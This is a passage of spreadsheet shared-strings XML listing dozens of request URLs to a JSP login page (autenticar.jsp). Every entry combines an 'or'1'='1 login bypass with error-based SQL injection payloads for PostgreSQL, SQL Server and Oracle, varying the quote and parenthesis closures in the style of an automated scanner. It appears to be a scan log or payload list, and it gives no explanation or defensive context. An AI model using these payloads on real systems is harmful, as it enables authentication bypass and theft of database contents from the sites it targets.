    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('rwoc'='rwoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('rowp'='rowp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'gvtr'='gvtr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('dupf'like'dupf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('rbfe'like'rbfe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('qqbi'like'qqbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'iuso'like'iuso</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("ulef"="ulef</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("obmr"="obmr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("bwis"="bwis</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"hmrn"="hmrn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("lwwp"like"lwwp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("iuxt"like"iuxt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("jxjf"like"jxjf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"evtw"like"evtw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(9084=9084</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((4622=4622</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((422=422</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('crao'='crao</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('tspw'='tspw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('zmsd'='zmsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'vgtv'='vgtv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('eecx'like'eecx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('vgnv'like'vgnv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('phko'like'phko</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'vjuy'like'vjuy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("iraf"="iraf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("dmcb"="dmcb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("vcva"="vcva</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"ilrg"="ilrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("epsn"like"epsn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("qqja"like"qqja</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("fhav"like"fhav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9295=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9295=9295)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"hyce"like"hyce</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(5753=5753</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((2579=2579</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((1964=1964</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('psww'='psww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('oanq'='oanq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('afpx'='afpx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'kpiw'='kpiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('tmbj'like'tmbj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('gmui'like'gmui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('uamx'like'uamx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'uaee'like'uaee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("ijsp"="ijsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("jobg"="jobg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("jbkj"="jbkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"wcdp"="wcdp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("tqpt"like"tqpt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("kfmy"like"kfmy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("uluq"like"uluq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6990in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"momn"like"momn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(7261=7261</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((5546=5546</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(((8667=8667</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('aini'='aini</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('mlqc'='mlqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('drzw'='drzw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'gnxd'='gnxd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('lhdt'like'lhdt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('chgt'like'chgt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('gkgg'like'gkgg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'aabp'like'aabp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("kyeo"="kyeo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("voek"="voek</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("imbx"="imbx</t>
  </si>
